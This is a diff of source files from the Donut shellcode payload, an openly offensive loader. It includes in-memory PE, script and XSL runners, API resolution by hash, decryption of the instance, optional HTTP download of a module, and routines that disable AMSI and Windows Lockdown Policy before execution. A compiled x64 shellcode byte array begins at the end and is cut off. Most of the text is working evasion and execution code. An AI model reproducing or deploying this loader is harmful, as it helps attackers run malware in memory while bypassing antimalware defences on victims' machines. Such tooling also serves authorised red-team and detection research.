147 if (IMAGE_SNAP_BY_ORDINAL(oft->u1.Ordinal)) {
148 *func = (ULONG_PTR)inst->api.GetProcAddress(dll, (LPCSTR)IMAGE_ORDINAL(oft->u1.Ordinal));
149 } else {
150 // Resolve by name
151 ibn = RVA2VA(PIMAGE_IMPORT_BY_NAME, cs, oft->u1.AddressOfData);
152 *func = (ULONG_PTR)inst->api.GetProcAddress(dll, ibn->Name);
153 }
154 }
155 }
156
157 DPRINT("Applying Relocations");
158 rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress;
159 ibr = RVA2VA(PIMAGE_BASE_RELOCATION, cs, rva);
160 ofs = (PBYTE)cs - nt->OptionalHeader.ImageBase;
161
162 while(ibr->VirtualAddress != 0) {
163 list = (PIMAGE_RELOC)(ibr + 1);
164
165 while ((PBYTE)list != (PBYTE)ibr + ibr->SizeOfBlock) {
166 if(list->type == IMAGE_REL_TYPE) {
167 *(ULONG_PTR*)((PBYTE)cs + ibr->VirtualAddress + list->offset) += (ULONG_PTR)ofs;
168 } else if(list->type != IMAGE_REL_BASED_ABSOLUTE) {
169 DPRINT("ERROR: Unrecognized Relocation type %08lx.", (DWORD)list->type);
170 goto pe_cleanup;
171 }
172 list++;
173 }
174 ibr = (PIMAGE_BASE_RELOCATION)list;
175 }
176
177 if(mod->type == DONUT_MODULE_DLL) {
178 // call exported api?
179 if(mod->method[0] != 0) {
180 DPRINT("Resolving address of %s", (char*)mod->method);
181
182 rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
183
184 if(rva != 0) {
185 exp = RVA2VA(PIMAGE_EXPORT_DIRECTORY, cs, rva);
186 cnt = exp->NumberOfNames;
187
188 DPRINT("IMAGE_EXPORT_DIRECTORY.NumberOfNames : %i", cnt);
189
190 if(cnt != 0) {
191 adr = RVA2VA(PDWORD,cs, exp->AddressOfFunctions);
192 sym = RVA2VA(PDWORD,cs, exp->AddressOfNames);
193 ord = RVA2VA(PWORD, cs, exp->AddressOfNameOrdinals);
194
195 do {
196 str = RVA2VA(PCHAR, cs, sym[cnt-1]);
197 if(!xstrcmp(str, (char*)mod->method)) {
198 api = RVA2VA(FARPROC, cs, adr[ord[cnt-1]]);
199 break;
200 }
201 } while (--cnt);
202
203 if(api != NULL) {
204 CallApi = inst->api.VirtualAlloc(
205 NULL,
206 sizeof(CALL_API_BIN),
207 MEM_COMMIT | MEM_RESERVE,
208 PAGE_EXECUTE_READWRITE);
209
210 if(CallApi != NULL) {
211 DPRINT("Calling %s via code stub.", (char*)mod->method);
212 Memcpy((void*)CallApi, (void*)CALL_API_BIN, sizeof(CALL_API_BIN));
213 CallApi(api, mod->param_cnt, mod->param);
214 DPRINT("Erasing code stub");
215 Memset(CallApi, 0, sizeof(CALL_API_BIN));
216 inst->api.VirtualFree(CallApi, 0, MEM_DECOMMIT | MEM_RELEASE);
217 }
218 } else {
219 DPRINT("Unable to resolve API");
220 goto pe_cleanup;
221 }
222 }
223 }
224 } else {
225 DPRINT("Executing entrypoint of DLL\n\n");
226 DllMain = RVA2VA(DllMain_t, cs, nt->OptionalHeader.AddressOfEntryPoint);
227 DllMain(host, DLL_PROCESS_ATTACH, NULL);
228 }
229 } else {
230 // The problem with executing EXE files:
231 // 1) They use subsystems either GUI or CUI
232 // 2) They call ExitProcess ...will need to review support of this later.
233 DPRINT("Executing entrypoint of EXE\n\n");
234 Start = RVA2VA(Start_t, cs, nt->OptionalHeader.AddressOfEntryPoint);
235 Start();
236 }
237 pe_cleanup:
238 // if memory allocated
239 if(cs != NULL) {
240 // DPRINT("Erasing %" PRIi32 " bytes of memory at %p",
241 // nt->OptionalHeader.SizeOfImage, cs);
242 // erase from memory (disabled for now)
243 // Memset(cs, 0, nt->OptionalHeader.SizeOfImage);
244 // release
245 DPRINT("Releasing memory");
246 inst->api.VirtualFree(cs, 0, MEM_DECOMMIT | MEM_RELEASE);
247 }
248 }
+156
-0
payload/inmem_script.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 VOID RunScript(PDONUT_INSTANCE inst) {
32 HRESULT hr;
33 IActiveScriptParse *parser;
34 IActiveScript *engine;
35 MyIActiveScriptSite mas;
36 IActiveScriptSiteVtbl activescript_vtbl;
37 IHostVtbl wscript_vtbl;
38 PDONUT_MODULE mod;
39 PWCHAR script;
40 ULONG64 len;
41 BSTR obj;
42 BOOL disabled;
43
44 if(inst->type == DONUT_INSTANCE_PIC) {
45 DPRINT("Using module embedded in instance");
46 mod = (PDONUT_MODULE)&inst->module.x;
47 } else {
48 DPRINT("Loading module from allocated memory");
49 mod = inst->module.p;
50 }
51
52 // 1. Allocate memory for unicode format of script
53 script = (PWCHAR)inst->api.VirtualAlloc(
54 NULL,
55 (inst->mod_len + 1) * sizeof(WCHAR),
56 MEM_COMMIT | MEM_RESERVE,
57 PAGE_READWRITE);
58
59 // 2. Convert string to unicode.
60 if(script != NULL) {
61 // 2. Convert string to unicode.
62 inst->api.MultiByteToWideChar(CP_ACP, 0, mod->data,
63 -1, script, mod->len * sizeof(WCHAR));
64
65 // we're using stack memory for the virtual function table
66 mas.site.lpVtbl = (IActiveScriptSiteVtbl*)&activescript_vtbl;
67 ActiveScript_New(inst, &mas.site);
68
69 mas.wscript.lpVtbl = (IHostVtbl*)&wscript_vtbl;
70 Host_New(inst, &mas.wscript);
71
72 mas.siteWnd.lpVtbl = NULL;
73
74 // 4. Initialize COM, MyIActiveScriptSite and event for OnLeaveScript method
75 DPRINT("CoInitializeEx");
76 hr = inst->api.CoInitializeEx(NULL, COINIT_MULTITHREADED);
77
78 if(hr == S_OK) {
79 // 5. Instantiate the active script engine
80 DPRINT("CoCreateInstance(IID_IActiveScript)");
81
82 hr = inst->api.CoCreateInstance(
83 &inst->xCLSID_ScriptLanguage, 0,
84 CLSCTX_INPROC_SERVER | CLSCTX_INPROC_HANDLER,
85 &inst->xIID_IActiveScript, (void **)&engine);
86
87 if(hr == S_OK) {
88 // 6. Get IActiveScriptParse object from engine
89 DPRINT("IActiveScript::QueryInterface(IActiveScriptParse)");
90
91 hr = engine->lpVtbl->QueryInterface(
92 engine,
93 #ifdef _WIN64
94 &inst->xIID_IActiveScriptParse64,
95 #else
96 &inst->xIID_IActiveScriptParse32,
97 #endif
98 (void **)&parser);
99
100 if(hr == S_OK) {
101 // 7. Initialize parser
102 DPRINT("IActiveScriptParse::InitNew");
103 hr = parser->lpVtbl->InitNew(parser);
104
105 if(hr == S_OK) {
106 // 8. Set custom script interface
107 DPRINT("IActiveScript::SetScriptSite");
108 mas.wscript.lpEngine = engine;
109
110 hr = engine->lpVtbl->SetScriptSite(
111 engine, (IActiveScriptSite *)&mas);
112
113 if(hr == S_OK) {
114 DPRINT("IActiveScript::AddNamedItem(\"%ws\")", inst->wscript);
115 obj = inst->api.SysAllocString(inst->wscript);
116 hr = engine->lpVtbl->AddNamedItem(engine, (LPCOLESTR)obj, SCRIPTITEM_ISVISIBLE);
117 inst->api.SysFreeString(obj);
118
119 if(hr == S_OK) {
120 // 9. Load script
121 DPRINT("IActiveScriptParse::ParseScriptText");
122 hr = parser->lpVtbl->ParseScriptText(
123 parser, (LPCOLESTR)script, NULL, NULL, NULL, 0, 0, 0, NULL, NULL);
124
125 if(hr == S_OK) {
126 // 10. Run script
127 DPRINT("IActiveScript::SetScriptState(SCRIPTSTATE_CONNECTED)");
128 hr = engine->lpVtbl->SetScriptState(
129 engine, SCRIPTSTATE_CONNECTED);
130
131 // SetScriptState blocks here
132 }
133 }
134 }
135 }
136 DPRINT("IActiveScriptParse::Release");
137 parser->lpVtbl->Release(parser);
138 }
139 DPRINT("IActiveScript::Close");
140 engine->lpVtbl->Close(engine);
141
142 DPRINT("IActiveScript::Release");
143 engine->lpVtbl->Release(engine);
144 }
145 }
146 DPRINT("Erasing script from memory");
147 Memset(script, 0, (inst->mod_len + 1) * sizeof(WCHAR));
148
149 DPRINT("VirtualFree(script)");
150 inst->api.VirtualFree(script, 0, MEM_RELEASE | MEM_DECOMMIT);
151 }
152 }
153
154 #include "activescript.c"
155 #include "wscript.c"
+109
-0
payload/inmem_xsl.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 VOID RunXSL(PDONUT_INSTANCE inst) {
32 IXMLDOMDocument *pDoc;
33 IXMLDOMNode *pNode;
34 HRESULT hr;
35 PWCHAR xsl_str;
36 VARIANT_BOOL loaded;
37 BSTR res;
38 PDONUT_MODULE mod;
39 ULONG64 len;
40 UCHAR c;
41
42 if(inst->type == DONUT_INSTANCE_PIC) {
43 DPRINT("Using module embedded in instance");
44 mod = (PDONUT_MODULE)&inst->module.x;
45 } else {
46 DPRINT("Loading module from allocated memory");
47 mod = inst->module.p;
48 }
49
50 // 1. Allocate RW memory for unicode format of script
51 xsl_str = (PWCHAR)inst->api.VirtualAlloc(
52 NULL,
53 (inst->mod_len + 1) * sizeof(WCHAR),
54 MEM_COMMIT | MEM_RESERVE,
55 PAGE_READWRITE);
56
57 if(xsl_str != NULL) {
58 // 2. Convert string to unicode.
59 inst->api.MultiByteToWideChar(CP_ACP, 0, mod->data,
60 -1, xsl_str, mod->len * sizeof(WCHAR));
61
62 // 3. Initialize COM
63 DPRINT("CoInitializeEx");
64 hr = inst->api.CoInitializeEx(NULL, COINIT_MULTITHREADED);
65
66 if(hr == S_OK) {
67 // 4. Instantiate XMLDOMDocument object
68 DPRINT("CoCreateInstance");
69 hr = inst->api.CoCreateInstance(
70 &inst->xCLSID_DOMDocument30,
71 NULL, CLSCTX_INPROC_SERVER,
72 &inst->xIID_IXMLDOMDocument,
73 (void**)&pDoc);
74
75 if(hr == S_OK) {
76 // 5. load XSL file
77 DPRINT("IXMLDOMDocument::loadXML");
78 hr = pDoc->lpVtbl->loadXML(pDoc, (BSTR)xsl_str, &loaded);
79 DPRINT("HRESULT: %08lx loaded : %s",
80 hr, loaded ? "TRUE" : "FALSE");
81
82 if(hr == S_OK && loaded) {
83 // 6. query node interface
84 DPRINT("IXMLDOMDocument::QueryInterface");
85 hr = pDoc->lpVtbl->QueryInterface(
86 pDoc, &inst->xIID_IXMLDOMNode, (void **)&pNode);
87
88 if(hr == S_OK) {
89 DPRINT("HRESULT: %08lx", hr);
90 // 7. execute script
91 DPRINT("IXMLDOMDocument::transformNode");
92 hr = pDoc->lpVtbl->transformNode(pDoc, pNode, &res);
93 DPRINT("HRESULT: %08lx", hr);
94 pNode->lpVtbl->Release(pNode);
95 }
96 }
97 pDoc->lpVtbl->Release(pDoc);
98 }
99 DPRINT("CoUninitialize");
100 inst->api.CoUninitialize();
101 }
102 DPRINT("Erasing XSL from memory.");
103 Memset(xsl_str, 0, (inst->mod_len + 1) * sizeof(WCHAR));
104
105 DPRINT("VirtualFree()");
106 inst->api.VirtualFree(xsl_str, 0, MEM_RELEASE | MEM_DECOMMIT);
107 }
108 }
+1
-0
payload/order.txt less more
0 ThreadProc
+267
-0
payload/payload.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include "payload.h"
32
33 DWORD ThreadProc(LPVOID lpParameter) {
34 ULONG i, ofs;
35 ULONG64 sig;
36 PDONUT_INSTANCE inst = (PDONUT_INSTANCE)lpParameter;
37 DONUT_ASSEMBLY assembly;
38 PDONUT_MODULE mod;
39 VirtualAlloc_t _VirtualAlloc;
40 VirtualFree_t _VirtualFree;
41 LPVOID pv;
42 ULONG64 hash;
43 BOOL disabled;
44
45 DPRINT("Maru IV : %" PRIX64, inst->iv);
46
47 hash = inst->api.hash[ (offsetof(DONUT_INSTANCE, api.VirtualAlloc) - offsetof(DONUT_INSTANCE, api)) / sizeof(ULONG_PTR)];
48 DPRINT("Resolving address for VirtualAlloc() : %" PRIX64, hash);
49 _VirtualAlloc = (VirtualAlloc_t)xGetProcAddress(inst, hash, inst->iv);
50
51 hash = inst->api.hash[ (offsetof(DONUT_INSTANCE, api.VirtualFree) - offsetof(DONUT_INSTANCE, api)) / sizeof(ULONG_PTR)];
52 DPRINT("Resolving address for VirtualAlloc() : %" PRIX64, hash);
53 _VirtualFree = (VirtualFree_t) xGetProcAddress(inst, hash, inst->iv);
54
55 if(_VirtualAlloc == NULL || _VirtualFree == NULL) {
56 DPRINT("FAILED!.");
57 return -1;
58 }
59
60 DPRINT("VirtualAlloc : %p VirtualFree : %p",
61 (LPVOID)_VirtualAlloc, (LPVOID)_VirtualFree);
62
63 DPRINT("Allocating %i bytes of RW memory", inst->len);
64 pv = _VirtualAlloc(NULL, inst->len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
65
66 if(pv == NULL) {
67 DPRINT("Memory allocation failed...");
68 return -1;
69 }
70 DPRINT("Copying %i bytes of data to memory %p", inst->len, pv);
71 Memcpy(pv, lpParameter, inst->len);
72 inst = (PDONUT_INSTANCE)pv;
73
74 DPRINT("Zero initializing PDONUT_ASSEMBLY");
75 Memset(&assembly, 0, sizeof(assembly));
76
77 #if !defined(NOCRYPTO)
78 PBYTE inst_data;
79 // load pointer to data just past len + key
80 inst_data = (PBYTE)inst + offsetof(DONUT_INSTANCE, api_cnt);
81
82 DPRINT("Decrypting %li bytes of instance", inst->len);
83
84 donut_decrypt(inst->key.mk,
85 inst->key.ctr,
86 inst_data,
87 inst->len - offsetof(DONUT_INSTANCE, api_cnt));
88
89 DPRINT("Generating hash to verify decryption");
90 ULONG64 mac = maru(inst->sig, inst->iv);
91 DPRINT("Instance : %016llx | Result : %016llx", inst->mac, mac);
92
93 if(mac != inst->mac) {
94 DPRINT("Decryption of instance failed");
95 goto erase_memory;
96 }
97 #endif
98 DPRINT("Resolving LoadLibraryA");
99
100 inst->api.addr[0] = xGetProcAddress(inst, inst->api.hash[0], inst->iv);
101 if(inst->api.addr[0] == NULL) return -1;
102
103 for(i=0; i<inst->dll_cnt; i++) {
104 DPRINT("Loading %s ...", inst->dll_name[i]);
105 inst->api.LoadLibraryA(inst->dll_name[i]);
106 }
107
108 DPRINT("Resolving %i API", inst->api_cnt);
109
110 for(i=1; i<inst->api_cnt; i++) {
111 DPRINT("Resolving API address for %016llX", inst->api.hash[i]);
112
113 inst->api.addr[i] = xGetProcAddress(inst, inst->api.hash[i], inst->iv);
114
115 if(inst->api.addr[i] == NULL) {
116 DPRINT("Failed to resolve API");
117 goto erase_memory;
118 }
119 }
120
121 if(inst->type == DONUT_INSTANCE_URL) {
122 DPRINT("Instance is URL");
123 if(!DownloadModule(inst)) goto erase_memory;
124 }
125
126 if(inst->type == DONUT_INSTANCE_PIC) {
127 DPRINT("Using module embedded in instance");
128 mod = (PDONUT_MODULE)&inst->module.x;
129 } else {
130 DPRINT("Loading module from allocated memory");
131 mod = inst->module.p;
132 }
133
134 // try bypassing AMSI and WLDP?
135 if(inst->bypass != DONUT_BYPASS_SKIP) {
136 // Try to disable AMSI
137 disabled = DisableAMSI(inst);
138 DPRINT("DisableAMSI %s", disabled ? "OK" : "FAILED");
139 if(!disabled && inst->bypass == DONUT_BYPASS_ABORT)
140 goto erase_memory;
141
142 // Try to disable WLDP
143 disabled = DisableWLDP(inst);
144 DPRINT("DisableWLDP %s", disabled ? "OK" : "FAILED");
145 if(!disabled && inst->bypass == DONUT_BYPASS_ABORT)
146 goto erase_memory;
147 }
148
149 // unmanaged EXE/DLL?
150 if(mod->type == DONUT_MODULE_DLL ||
151 mod->type == DONUT_MODULE_EXE) {
152 RunPE(inst);
153 } else
154 // .NET EXE/DLL?
155 if(mod->type == DONUT_MODULE_NET_DLL ||
156 mod->type == DONUT_MODULE_NET_EXE)
157 {
158 if(LoadAssembly(inst, &assembly)) {
159 RunAssembly(inst, &assembly);
160 }
161 FreeAssembly(inst, &assembly);
162 } else
163 // vbs or js?
164 if(mod->type == DONUT_MODULE_VBS ||
165 mod->type == DONUT_MODULE_JS)
166 {
167 RunScript(inst);
168 } else
169 // xsl?
170 if(mod->type == DONUT_MODULE_XSL) {
171 RunXSL(inst);
172 }
173
174 erase_memory:
175 // if module was downloaded
176 if(inst->type == DONUT_INSTANCE_URL) {
177 if(inst->module.p != NULL) {
178 // overwrite memory with zeros
179 Memset(inst->module.p, 0, (DWORD)inst->mod_len);
180
181 // free memory
182 inst->api.VirtualFree(inst->module.p, 0, MEM_RELEASE | MEM_DECOMMIT);
183 inst->module.p = NULL;
184 }
185 }
186
187 DPRINT("Erasing RW memory for instance");
188 Memset(inst, 0, inst->len);
189
190 DPRINT("Releasing RW memory for instance");
191 _VirtualFree(inst, 0, MEM_DECOMMIT | MEM_RELEASE);
192
193 return 0;
194 }
195
196 #include "http_client.c" // For downloading module
197
198 #include "inmem_dotnet.c" // .NET assemblies
199 #include "inmem_pe.c" // Unmanaged PE/DLL files
200 #include "inmem_xsl.c" // XSL files
201 #include "inmem_script.c" // VBS/JS files
202
203 #include "peb.c" // resolve functions in export table
204
205 #include "bypass.c" // Bypass AMSI and WLDP
206 #include "getpc.c" // code stub to return program counter (always at the end!)
207
208 // the following code is *only* for development purposes
209 // given an instance file, it will run as if running on a target system
210 // attach a debugger to host process
211 #ifdef DEBUG
212
213 #include <stdio.h>
214 #include <string.h>
215 #include <stdlib.h>
216 #include <sys/stat.h>
217
218 int main(int argc, char *argv[]) {
219 FILE *fd;
220 struct stat fs;
221 PDONUT_INSTANCE inst;
222 DWORD old;
223
224 if(argc != 2) {
225 printf(" [ usage: payload <instance>\n");
226 return 0;
227 }
228 // get size of instance
229 if(stat(argv[1], &fs) != 0) {
230 printf(" [ unable to obtain size of instance.\n");
231 return 0;
232 }
233
234 // zero size?
235 if(fs.st_size == 0) {
236 printf(" [ invalid instance.\n");
237 return 0;
238 }
239
240 // try open for reading
241 fd = fopen(argv[1], "rb");
242 if(fd == NULL) {
243 printf(" [ unable to open %s.\n", argv[1]);
244 return 0;
245 }
246
247 // allocate memory
248 inst = (PDONUT_INSTANCE)VirtualAlloc(NULL, fs.st_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
249
250 if(inst != NULL) {
251 fread(inst, 1, fs.st_size, fd);
252
253 // change protection to PAGE_EXECUTE_READ
254 if(VirtualProtect((LPVOID)inst, fs.st_size, PAGE_EXECUTE_READ, &old)) {
255 printf("Running...");
256
257 // run payload with instance
258 ThreadProc(inst);
259 }
260 // deallocate
261 VirtualFree((LPVOID)inst, 0, MEM_DECOMMIT | MEM_RELEASE);
262 }
263 fclose(fd);
264 return 0;
265 }
266 #endif
+145
-0
payload/payload.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef PAYLOAD_H
32 #define PAYLOAD_H
33
34 #if !defined(_MSC_VER)
35 #define __out_ecount_full(x)
36 #define __out_ecount_full_opt(x)
37 #include <inttypes.h>
38 #endif
39
40 #include <windows.h>
41 #include <wincrypt.h>
42 #include <oleauto.h>
43 #include <objbase.h>
44 #include <wininet.h>
45
46 #pragma comment(lib, "wininet.lib")
47 #pragma comment(lib, "advapi32.lib")
48 #pragma comment(lib, "crypt32.lib")
49
50 #if defined(DEBUG)
51 #include <stdio.h>
52 #include <string.h>
53
54 #define __FILENAME__ (strrchr(__FILE__, '\\') ? strrchr(__FILE__, '\\') + 1 : __FILE__)
55
56 #define DPRINT(...) { \
57 fprintf(stderr, "\nDEBUG: %s:%d:%s(): ", __FILENAME__, __LINE__, __FUNCTION__); \
58 fprintf(stderr, __VA_ARGS__); \
59 }
60 #else
61 #define DPRINT(...) // Don't do anything in release builds
62 #endif
63
64 #define STATIC_KEY ((__TIME__[7] - '0') * 1 + (__TIME__[6] - '0') * 10 + \
65 (__TIME__[4] - '0') * 60 + (__TIME__[3] - '0') * 600 + \
66 (__TIME__[1] - '0') * 3600 + (__TIME__[0] - '0') * 36000)
67
68 // Relative Virtual Address to Virtual Address
69 #define RVA2VA(type, base, rva) (type)((ULONG_PTR) base + rva)
70
71 #if defined(_M_IX86) || defined(__i386__)
72 // return pointer to code in memory
73 char *get_pc(void);
74
75 // PC-relative addressing for x86 code. Similar to RVA2VA except using functions in payload
76 #define ADR(type, addr) (type)(get_pc() - ((ULONG_PTR)&get_pc - (ULONG_PTR)addr))
77 #else
78 #define ADR(type, addr) (type)(addr) // do nothing on 64-bit
79 #endif
80
81 void *Memset(void *ptr, int value, size_t num);
82 void *Memcpy(void *destination, const void *source, size_t num);
83 int Memcmp(const void *ptr1, const void *ptr2, size_t num);
84
85 #if !defined(_MSC_VER)
86 #define memcmp(x,y,z) Memcmp(x,y,z)
87 #endif
88
89 #include "peb.h" // Process Environment Block
90 #include "winapi.h" // Prototypes
91 #include "clr.h" // Common Language Runtime Interface
92
93 #include "donut.h"
94
95 #include "amsi.h" // Anti-malware Scan Interface
96 #include "activescript.h" // Interfaces for executing VBS/JS files
97 #include "wscript.h" // Interfaces to support WScript object
98
99 typedef struct {
100 IActiveScriptSite site;
101 IActiveScriptSiteWindow siteWnd;
102 IHost wscript;
103 HANDLE hEvent;
104 PDONUT_INSTANCE inst; //
105 } MyIActiveScriptSite;
106
107 // internal structure
108 typedef struct _DONUT_ASSEMBLY {
109 ICLRMetaHost *icmh;
110 ICLRRuntimeInfo *icri;
111 ICorRuntimeHost *icrh;
112 IUnknown *iu;
113 AppDomain *ad;
114 Assembly *as;
115 Type *type;
116 MethodInfo *mi;
117 } DONUT_ASSEMBLY, *PDONUT_ASSEMBLY;
118
119 // Downloads a module from remote HTTP server into memory
120 BOOL DownloadModule(PDONUT_INSTANCE);
121
122 // .NET DLL/EXE
123 BOOL LoadAssembly(PDONUT_INSTANCE, PDONUT_ASSEMBLY);
124 BOOL RunAssembly(PDONUT_INSTANCE, PDONUT_ASSEMBLY);
125 VOID FreeAssembly(PDONUT_INSTANCE, PDONUT_ASSEMBLY);
126
127 // Extensible Stylesheet Language Transformations
128 VOID RunXSL(PDONUT_INSTANCE);
129
130 // In-Memory execution of native DLL
131 VOID RunPE(PDONUT_INSTANCE);
132
133 // VBS / JS files
134 VOID RunScript(PDONUT_INSTANCE);
135
136 // Disables Antimalware Scan Interface
137 BOOL DisableAMSI(PDONUT_INSTANCE);
138
139 // Disables Windows Lockdown Policy
140 BOOL DisableWLDP(PDONUT_INSTANCE);
141
142 LPVOID xGetProcAddress(PDONUT_INSTANCE, ULONGLONG, ULONGLONG);
143
144 #endif
+1361
-0
payload/payload_exe_x64.h less more
0
1 unsigned char PAYLOAD_EXE_X64[] = {
2 0x55, 0x48, 0x89, 0xe5, 0x48, 0x81, 0xec, 0xb0, 0x00, 0x00, 0x00, 0x48,
3 0x89, 0x4d, 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xe8, 0x48,
4 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x40, 0x48, 0x48, 0x89, 0x45, 0xe0, 0x48,
5 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x48, 0x28, 0x48, 0x8b, 0x55, 0xe0, 0x48,
6 0x8b, 0x45, 0xe8, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0x7f, 0x34,
7 0x00, 0x00, 0x48, 0x89, 0x45, 0xd8, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b,
8 0x40, 0x50, 0x48, 0x89, 0x45, 0xe0, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b,
9 0x48, 0x28, 0x48, 0x8b, 0x55, 0xe0, 0x48, 0x8b, 0x45, 0xe8, 0x49, 0x89,
